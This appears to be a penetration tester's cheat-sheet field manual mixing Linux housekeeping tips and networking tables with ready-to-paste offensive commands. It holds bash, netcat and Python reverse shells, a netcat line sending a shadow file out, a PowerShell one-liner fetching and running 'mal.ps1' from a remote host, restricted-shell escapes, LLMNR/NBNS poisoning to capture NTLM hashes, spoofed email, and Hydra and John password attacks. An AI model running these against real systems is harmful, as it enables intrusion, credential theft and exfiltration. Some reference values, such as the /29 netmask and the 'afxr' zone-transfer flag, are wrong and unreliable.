Field Manual Table of Contents0x00 — Quick Reference 🚀0x01 — Reverse Shells 🐚Linux 🐧Python 🐍0x16 - Quality of Life 🤕Bash-ishI/O 💻Change iface names 🥅Realtek Driver Install 🔨WiFi Monitor Mode 🔎Kismet Setup 💋Kali Pinned on Ubuntu 🐲Kali Missing Key Fix 🐲Netfig 🥅Link Files to null ⚡️pv
utility 🔨Password Dump Search 🔍Nix Fix ⛑.bash_aliases 👻log terminal sessionsShortcut directoriesFirefox Profiles0x10 - Linux 🐧0x11 — BinaryID 📇objdump 🚚0x12 — Everythin netcat 🐱0x13 — D/encoding Data 🔑CyberChef 🕵Base64 🤙0x14 - RECON 👀DNS Enumeration 📛Mirror sites 🔀0x15 — CTF 👮Executions 🔫File Downloads ⏬Secure Deletion 🔐0x20 — Windows 🤖0x21 — CMD 👴0x22 — Powershell 💪0x30 - Placeholder0x31 TBD0x40 — Alternatives ♻️0x41 — XMLHttpRequest.js 🕸0x50 - Networking 🤓0x51 - Reference TablesTTL Fingerprints 🤞Classful IPv4 Ranges 🔩Private IPv4 Ranges 🔩IPv4 Subnets 🔩0x52 - DIY Servers 🖥0x56 - Mounting Shares 🐧0x57 - SMB Enum 🐧0x58 - NetBIOS/LLMNR 🛂0x59 - Port Forwarding 🚡Windows 👴Linux 🐧0xFF - Appendix 💦Links 🔗Alt. References 🔗Hash Reference 🥔John the Ripper 🔪Hydra 🐉Cheat Sheets 👀
Tips & tricks of the more ultra rare, spicy, variety.
On opposite day are reverse shells, bind shells? 💙
# Only works with the bash shell
rhost="10.0.0.1"; rport="8080"; /bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# bash -s | option enables bash to read from 'stdin'
xxxxxxxxxx
# Requires the nc binary
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
xxxxxxxxxx
# Python2.7 command (-c) to connect to 10.0.0.1:8080 using the socket library
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
x# Declare an indexed array
declare -a my_array
my_array[0]='zero'
my_array[1]='one'
# OR
my_array=(zero one)
# Print each index in my_array
for i in "${my_array[@]}"; do echo "$i"; done
# Declare an associative array (dictionary)
declare -A my_array
my_array=([z]=zero [o]=one)
# Print each key in my_array
for key in "${!my_array[@]}"; do echo "$key"; done
# Returns the size of the array
echo "${#my_array[@]}"
# Append to the array
my_array+=three
# Remove an index from the array
unset my_array[2]
# Remove key/pair from assoc. array
unset my_array[o]
I/O OP | USAGE |
---|---|
1> results.txt | stdout writes to the file |
2> stderr.txt | stderr writes to the file |
&> out.txt | stdout & stderr write to the file |
nc 10.0.0.1 1337 < shadow.txt | Send file input to 10.0.0.1:1337 |
COMMAND | EXAMPLE | INFO |
---|---|---|
fmt | cat words.txt | fmt | Formats stdin into paragraphs. |
pr | cat words.txt | fmt | pr | Formats stdin into pages. |
lpr | cat words.txt | fmt | pr | lpr | Sends stdin to a printer. |
tr | cat /dev/urandom | tr -dc '[:alnum:]' | Output random password from /dev/urandom |
xxxxxxxxxx
# Change Ubuntu 18.04 Network interfaces back to wlan/eth
sudo vim /etc/default/grub
# Edit the variable 'GRUB_CMDLINE_LINUX' to the following:
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
# Write / Quit then run the following
sudo update-grub && sudo reboot
# Check
sudo ip a
xxxxxxxxxx
# Download aircrack-ng linux driver
git clone -b v5.3.4 https://github.com/aircrack-ng/rtl8812au.git
cd rtl*
sudo make -j4
sudo make install
# 'make' installs the '88XXau.ko' driver to '/lib/modules/5.0.0-25-generic/kernel/drivers/net/wireless/' on Ubuntu 18.04
# Now edit /etc/NetworkManger/NetworkManager.conf and add the following. Replace the mac with the mac of the card
[keyfile]
unmanaged-devices=mac:00:c0:ca:95:b8:58
# Write / Quit
sudo service NetworkManager restart
xxxxxxxxxx
# Set interface down
sudo ip link set wlan1 down
# Set monitor mode
sudo iw dev wlan1 set type monitor
# Set interface up
sudo ip link set wlan1 up
# airodump-ng
sudo airodump-ng -w testdump --wps --beacon --band ag -M -U wlan1
xxxxxxxxxx
# Install for Ubuntu 18.04
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key | sudo apt-key add -
echo 'deb https://www.kismetwireless.net/repos/apt/release/bionic bionic main' | sudo tee /etc/apt/sources.list.d/kismet.list
sudo apt update
sudo apt install -y kismet
kismet wlan1
# Then go to the web interface http://localhost:2501
xxxxxxxxxx
# Add the following to /etc/apt/preferences.d/preferences
Package: *
Pin: release o=Ubuntu
Pin-Priority: 1000
Package: *
Pin: release a=kali-rolling
Pin-Priority: 100
# Write / Quit
echo -n 'deb http://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list
sudo apt update
xxxxxxxxxx
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
xxxxxxxxxx
# Spoof MAC Address
ifconfig eth0 hw ether 00:1c:bf:87:25:d5
# Change Default Gateway
route add default gw $IP_ADDRESS $INTERFACE_NAME
xxxxxxxxxx
# Symbolic link of /dev/null to new file of ${HOME}/nohup.out
ln -s /dev/null ${HOME}/nohup.out
pv
utility 🔨xxxxxxxxxx
# Display progress of file being read
pv -p -e '/usr/share/wordlists/WORDLISTS.tar.gz' | zgrep -ia 'myemail@gmail.com' | tee /tmp/results.lst
xxxxxxxxxx
gzip -cd *.tar.gz | grep -aniTEf ~/data/emails.egrep > matches.txt
# gzip --stdout --decompress
xxxxxxxxxx
# EXPIRED KEY - APT UPDATE
wget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -
ALIASES | INFO |
---|---|
alias ..='cd ..' | cd command shortcut |
alias ...='cd ../../../' | cd command shortcut |
alias ....='cd ../../../../' | cd command shortcut |
alias .2='cd ../../' | cd command shortcut |
alias .3='cd ../../../' | cd command shortcut |
alias .4='cd ../../../../' | cd command shortcut |
alias .5='cd ../../../../../' | cd command shortcut |
alias _='sudo' | sudo command shortcut |
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal | alert a notification popup |
alias bc='bc -l' | bc command fix |
alias c='clear' | clear command shortcut |
alias chgrp='sudo chgrp --preserve-root' | sudo command shortcut |
alias chmod='sudo chmod --preserve-root' | sudo command shortcut |
alias chown='sudo chown --preserve-root' | sudo command shortcut |
alias chownd='sudo chown -R --preserve-root $USER:$USER' | sudo command shortcut |
alias dd='dd status=progress' | Status is always progress |
alias dr='docker run -it' | Run container interactively |
alias drm='docker run -it --rm' | Run container then remove |
alias drme='docker run -it --rm -e HOME=$HOME -v $HOME:$HOME -w $PWD -u $(id -u):$(id -g)' | Run container with env variables |
alias egrep='egrep --color=auto' | *grep command shortcut |
alias exot='exit' | exit typo fix |
alias ff='sudo find . -type f -iname $1 2>/dev/null' | find a file from the current dir |
alias fgrep='fgrep --color=auto' | *grep command shortcut |
alias grep='grep --color=auto' | *grep command shortcut |
alias halt='sudo /sbin/halt' | sudo command shortcut |
alias ipt='sudo iptables' | iptables command shortcut |
alias iptlist='sudo /sbin/iptables -L -n -v --line-numbers' | iptables command shortcut |
alias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers' | iptables command shortcut |
alias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers' | iptables command shortcut |
alias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers' | iptables command shortcut |
alias l='ls -CF' | ls command shortcut |
alias la='ls -AF --color=auto' | ls command shortcut |
alias lc='cat -n' | cat with line numbers |
alias less='less -S' | Do NOT wrap lines in less |
alias lh='ls --color=auto -lisAdhF .[^.]*' | ls command shortcut |
alias ll='ls -lhF --color=auto' | ls command shortcut |
alias lla='ls -lAhF --color=auto' | ls command shortcut |
alias ls='ls --color=auto' | ls command shortcut |
alias mkdir='mkdir -pv' | mkdir folders verbosely |
alias netstat='sudo netstat -plan' | netstat all listening ports |
alias path='echo -e ${PATH//:/\\n}' | echo current $PATH variable |
alias ping='ping -c 3' | Do NOT ping continuously |
alias poweroff='sudo /sbin/poweroff' | sudo command shortcut |
alias reboot='sudo /sbin/reboot' | sudo command shortcut |
alias reload='reset; . ~/.bashrc; . ~/.bash_aliases' | Reload bash with proper env |
alias rm='rm -I --preserve-root' | rm interactively |
alias rms='shred -uz' | rm securely |
alias shutdown='sudo /sbin/shutdown' | sudo command shortcut |
alias txz='tar --xz -xf' | Un-tar xz files |
alias tzx='tar -zxf' | Un-tar gzip files |
alias wget='wget -c' | Continue wget downloads |
xxxxxxxxxx
script -t 2> timing.log -a output.session
scriptreplay timing.log output.session
xxxxxxxxxx
# Bookmark directories using 'pushd'
pushd /var/www/html/
pushd /etc/apt/
pushd ~/Projects/airodump/aug/
# Then use 'popd' to pull from the stack!
popd
firefox --noremote --ProfileManager
##
General Debian/Ubuntu based distro copy-&-paste-able commands
xxxxxxxxxx
objdump -f "$file" | grep '^architecture' | cut -d, -f1 | sed 's/architecture: //'
file mysterio.bin
xxxxxxxxxx
# Target 1
/bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# Reverse Shell
mknod backpipe p; nc ${rhost} ${rport} 0<backpipe | /bin/bash 1>backpipe
# One-shot Web Server
{ printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < some.file)"; cat some.file; } | nc -l ${lport}
# UDP Port scan
nc -vzu ${rhost} ${rports}
# Port scanning
nc -v -n -z -w 1 ${rhost} ${rports}
# NCat
# HTTPS GET Request
printf 'GET /rootme HTTP/1.1\r\nHost: rootme.com\r\n\r\n' | ncat --ssl rootme.com 443
# NCat SMTP Client
ncat -C mail.rootme.com 25
# HELO client.rootme.com
# MAIL FROM:attacker@rootme.com
# RCPT TO:victim@rootme.com
# DATA
# From: ceo@rootme.com
# To: victim@rootme.com
# Subject: You're fired.
#
# Sorry not sorry.
# .
# QUIT
# Netcat HTTP Request
nc 10.0.0.1 80
GET / HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0
Referrer: google.com
# <hit enter>
# Simple Web Server
# Linux
ncat -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"
# or
ncat --lua-exec httpd.lua --listen 8080 --keep-open
# Windows
ncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"
# Port forward
ncat -l localhost 8080 --sh-exec "ncat example.org 80"
# SSH Tunnel NCat
ssh -o ProxyCommand="ssh -q ${gateway} ncat %h %p" ${rhost}
# Dynamic SSH Tunnel
ssh ${gateway} -D 8080
ncat --proxy localhost:8080 --proxy-type socks5 ${rhost}
# SSH Tunneled NCat file transfer
ssh -NfL 1337:localhost:7331
ncat -v -w 2 localhost 1337 < sent
ncat -lvnp 7331 localhost > received
# NCat honeyport
ncat -l --keep-open 1337 --hex-dump gotscanned.log > /dev/null
# NCat SSL Tunnel
openssl req -new -x509 -keyout test-key.pem -out test-cert.pem
ncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem
ncat --ssl-verify --ssl-trustfile test-cert.pem
xxxxxxxxxx
# Write base64 data without newlines
base64 -w 0 foo.zip | base64 -d > foo2.zip
# base64: Removes any invalid input
cat file.b64 | base64 -di > binary
xxxxxxxxxx
# NameServers Query for target.org
dig +short ns target.org
# A RECORD DNS Query
# Goal: Get the IP's associated to the toplevel domain.
dig a target.org @nameserver
# MX RECORD DNS Query
# Goal: Find mail servers to enumerate
dig mx target.org @nameserver
# DNS Zone Transfer Query
# Goal: Aquire all DNS entries for hosts within the 'target.org' zone
dig afxr target.org @nameserver
# Bruteforce Subdomains
dnsrecon -d zonetransfer.me -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
xxxxxxxxxx
wget --mirror -k ${depth} ${url}
# -OR- httrack
Work arounds for restricted shells.
xxxxxxxxxx
# ez pz
cd "$(dirname ${path_to_bin}/rootme)"
# TTY Spawn
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
# Vi
vi
:!bash
# gcc compile
echo 'int main() { return chmod("/bin/chmod", 0755); }' | gcc -x c - && ./a.out
# x86 load file
/lib/i386-linux-gnu/ld-linux.so.2 ${path_to_bin}/rootme
# x64 load file
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ${path_to_bin}/rootme
install -m a+x /bin/chmod /tmp/chmod2
xxxxxxxxxx
curl -s https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat -o /tmp/socat/socat
# browser => developer tools => network => copy & paste response to file
cat file.b64 | base64 -di > binary
xxxxxxxxxx
_DEVICE="/dev/sdc"
_PASS=$(tr -cd '[:alnum:]' < /dev/urandom | head -c 128)
openssl enc -aes-256-ctr -pass pass:"${_PASS}" -nosalt </dev/zero | dd bs=64K ibs=64K of=$_DEVICE status=progress conv=notrunc
xxxxxxxxxx
type C:\Users\Administrator\Desktop\flag.txt
# Mount SMB Share
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
xxxxxxxxxx
iex ((New-Object Net.WebClient).DownloadString("https://abc.ru/mal.ps1"))
&"{Get-Content .\mal.ps1 | iex}"
Get-FileHash -Algorithm SHA512 .\test.txt
gci | foreach-object { write-output "Object: $_" }
gci | % { write-output "Object: $_" }
get-process | where-object { $_.name -eq "notepad" }
get-process | ? { $_.name -eq "notepad"}
1..254 | % { test-connection 192.168.0.$_ }
xxxxxxxxxx
// WUTitDO: Download a binary from Github
var github_user = "andrew-d";
var git_branch = "master";
// Raw base64 encoded byte stream
var b64raw = "https://raw.githubusercontent.com/"+ github_user +"/static-binaries/"+ git_branch +"/binaries/linux/x86_64/socat";
var xreq = new XMLHttpRequest();
xreq.open('GET', b64raw, true);
xreq.send();
document.write(xreq.responseText)
// Your webpage should now be base64 text to save
// If method 1 doesn't work try this!
var apijson = "https://api.github.com/repos/"+ github_user +"/static-binaries/contents/binaries/linux/x86_64/socat?ref=master";
var xreq = new XMLHttpRequest();
xreq.open('GET', apijson, true);
xreq.send();
document.write(JSON.parse(xreq.responseText).content)
// Your webpage should now be base64 text to save
OPERATING SYSTEM | TTL SIZE |
---|---|
Windows | 128 |
Linux | 64 |
Solaris | 255 |
Cisco / Network | 255 |
CLASS | IP ADDRESS RANGE |
---|---|
A | 0.0.0.0 - 127.255.255.255 |
B | 128.0.0.0 - 191.255.255.255 |
C | 192.0.0.0 - 223.255.255.255 |
D | 224.0.0.0 - 239.255.255.255 |
E | 240.0.0.0 - 255.255.255.255 |
CLASS | RANGE |
---|---|
A | 10.0.0.0 - 10.255.255.255 |
B | 172.16.0.0 - 172.31.255.255 |
C | 192.168.0.0 - 192.168.255.255 |
D | 127.0.0.0 - 127.255.255.255 |
CIDR | DECIMAL MASK | NUMBER OF HOSTS |
---|---|---|
/31 | 255.255.255.254 | 1 Host |
/30 | 255.255.255.252 | 2 Hosts |
/29 | 255.255.255.249 | 6 Hosts |
/28 | 255.255.255.240 | 14 Hosts |
/27 | 255.255.255.224 | 30 Hosts |
/26 | 255.255.255.192 | 62 Hosts |
/25 | 255.255.255.128 | 126 Hosts |
/24 | 255.255.255.0 | 254 Hosts |
/23 | 255.255.254.0 | 512 Host |
/22 | 255.255.252.0 | 1022 Hosts |
/21 | 255.255.248.0 | 2046 Hosts |
/20 | 255.255.240.0 | 4094 Hosts |
/19 | 255.255.224.0 | 8190 Hosts |
/18 | 255.255.192.0 | 16382 Hosts |
/17 | 255.255.128.0 | 32766 Hosts |
/16 | 255.255.0.0 | 65534 Hosts |
/15 | 255.254.0.0 | 131070 Hosts |
/14 | 255.252.0.0 | 262142 Hosts |
/13 | 255.248.0.0 | 524286 Hosts |
/12 | 255.240.0.0 | 1048674 Hosts |
/11 | 255.224.0.0 | 2097150 Hosts |
/10 | 255.192.0.0 | 4194302 Hosts |
/9 | 255.128.0.0 | 8388606 Hosts |
/8 | 255.0.0.0 | 16777214 Hosts |
xxxxxxxxxx
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
php -S 0.0.0.0:8080
xxxxxxxxxx
# NFS Shares are linux predominant
mount 10.0.0.1:/vol/share /mnt/nfs
# CIFS is a dialect of SMB and are windows predominant
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs
xxxxxxxxxx
# Enumerate users
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 10.0.0.1
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 10.0.0.0/24
# Default linux utilities
nmblookup -A 10.0.0.1
smbclient //MOUNT/share -I 10.0.0.1 -N
rpcclient -U "" 10.0.0.1
# SMB Version
smbclient -L //10.0.0.1
# Open SMB Shares on a subnet
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=${username},smbpass=${password} -p445 10.0.0.0/24
# See links for download
enum4linux 10.0.0.1
xxxxxxxxxx
msfconsole
# Spoof/Poison
use auxiliary/spoof/llmnr/llmnr_response
use auxiliary/spoof/nbns/nbns_response
# Capture Credentials
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
# -OR- See links to download
python Responder.py -i ${localhost-ip} -I eth0
# Produces NTLMv2 Hash to crack
xxxxxxxxxx
# See appendix for plink download link
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
-A
Allows Agent Forwarding-N
Do NOT execute a command-f
Background the proccessxxxxxxxxxx
# Local Port Forward
ssh -NAfL ${lport}:${final-host}:${rport} ${user}@${gateway-host}
# Example
ssh -NAfL 8080:192.168.0.3:80 root@192.168.0.2
xxxxxxxxxx
# Remote Port Forward
ssh -NAfR ${rport}:localhost:${port-to-publicize} user@${proxy-host}
ssh -NAfR 2222:localhost:22 user@192.168.0.2
xxxxxxxxxx
# Dynamic SOCKS Proxy
ssh -NAfD ${remote-proxy-port} ${remote-proxy-host}
# Example
ssh -NAfD 8080 root@10.0.0.80
Link | Usage |
---|---|
SimplyEmail | Email enumeration tool hosted on Github. |
udp-proto-scanner | UDP protocols scanner hosted on Github. |
Responder.py | NetBIOS/LLMNR Poisoning and Spoofing tool to capture NTLMv2 Hashes, hosted on Github. |
plink.exe | Link to download the x64 plink binary from the PuTTY project, for Remote Port Forwarding. |
HASH | SIZE |
---|---|
MD5 Hash Length | 16 Bytes |
SHA-1 | 20 Bytes |
SHA-256 | 32 Bytes |
SHA-512 | 64 Bytes |
HASH | EXAMPLE |
---|---|
MD5 Hash | 8743b52063cd84097a65d1633f5c74f5 |
MD5 $PASS:$SALT | 01dfae6e5d4d90d9892622325959afbe:7050461 |
MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
SHA1 Hash | b89eaac7e61417341b710b727768294d0e6a277b |
SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 |
SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 |
SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd |
SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a |
NTLM Hash | b4b9b02e6f09a9bd760f388b67351e2b |
xxxxxxxxxx
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
# Formatted Hash with Wordlist Attack
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
# Formatted Hash with Bruteforce Attack
john --format=descrypt hash --show
xxxxxxxxxx
# FTP
hydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 ftp -V
# POP3
hydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 pop3 -V
# SMTP
hydra -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 smtp -V
# Use (-t) to limit concurrent connections - ex: hydra -t 15